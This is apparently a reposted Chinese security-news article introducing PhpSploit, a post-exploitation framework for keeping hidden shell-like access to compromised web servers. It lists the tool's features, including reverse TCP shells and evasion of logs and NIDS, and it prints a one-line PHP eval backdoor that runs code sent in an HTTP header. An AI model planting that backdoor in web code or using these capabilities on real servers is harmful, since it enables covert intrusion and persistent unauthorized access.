内容简介:PhpSploit:一款隐蔽性极强的后渗透利用框架
今天给大家介绍的是一款名叫PhpSploit的远程控制框架,该 工具 可以帮助攻击者在客户端与Web服务器端之间建立隐蔽性极强的交互式链接(类似Shell)。简而言之,这是一款后渗透利用工具,它能够让攻击者与目标主机(例如被入侵的Web服务器)维持访问链接,并实现提权操作。
概述
该工具会对标准客户端请求以及Web服务器相关请求的HTTP头数据进行混淆处理,并利用一个小型的多态后门来实现隐蔽通信:
<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>
功能介绍
效率高:
1. 提供了超过20款自动化后渗透利用工具;
2. 运行命令、浏览文件系统、绕过 PHP 安全限制;
3. 在目标客户端与攻击者端之间实现文件的上传和下载;
4. 通过本地文本编辑器编辑远程文件;
5. 在目标系统中运行 SQL 语句;
6. 生成反向TCP Shell;
隐蔽性强:
1. 专为偏执狂设计;
2. 日志分析以及NIDS签名检测机制几乎无法检测到它;
3. 绕过安全模式以及常见PHP安全限制;
4. 通信信息隐藏在HTTP头中;
5. 加载的Payload经过了混淆处理以绕过NIDS;
6. 支持http/https/socks4/socks5代理;
使用便捷:
1. 跨平台;
2. 强大的界面,完整的命令支持;
3. 提供了会话保存/加载功能;
4. 支持大型Payload,支持多重请求;
5. 提供了强大的、高度可配置的设置引擎;
6. 每一个设置(例如用户代理)都有多态模式;
7. 提供了完整的插件开发API;
支持的平台(攻击者端)
1. GNU/Linux
2. MacOS X
支持的平台(目标用户端)
1. GNU/Linux
2. BSDLike
3. MacOS X
4. WindowsNT
工具下载
【 GitHub传送门 】
* 参考来源: n0where ,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- ICMP隐蔽隧道从入门到精通
- 浅谈http隐蔽隧道下的RDP暴力破解
- SSHazam:如何利用SSH隧道实现隐蔽C2通信
- SSHazam:如何利用SSH隧道实现隐蔽C2通信
- bug诞生记——隐蔽的指针偏移计算导致的数据错乱
- 两类非常隐蔽的全表扫描,不能命中索引(一分钟系列)
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
计算机程序设计艺术
Donald E.Knuth / 黄林鹏 / 机械工业出版社 / 2010-8 / 69.00元
《计算机程序设计艺术(第4卷·第0册):组合算法与布尔函数概论(双语版)》是《计算机程序设计艺术,第4卷:组合算法》的第0册。《计算机程序设计艺术(第4卷·第0册):组合算法与布尔函数概论(双语版)》介绍了组合搜索历史和演化,涉及组合搜索技术的理论和实践应用,探究了布尔函数相关的所有重要问题,考察了如何最有效地计算一个布尔函数的值的技术。本册是《计算机程序设计艺术的》第7章,即组合搜索一长篇宏论的......一起来看看 《计算机程序设计艺术》 这本书的介绍吧!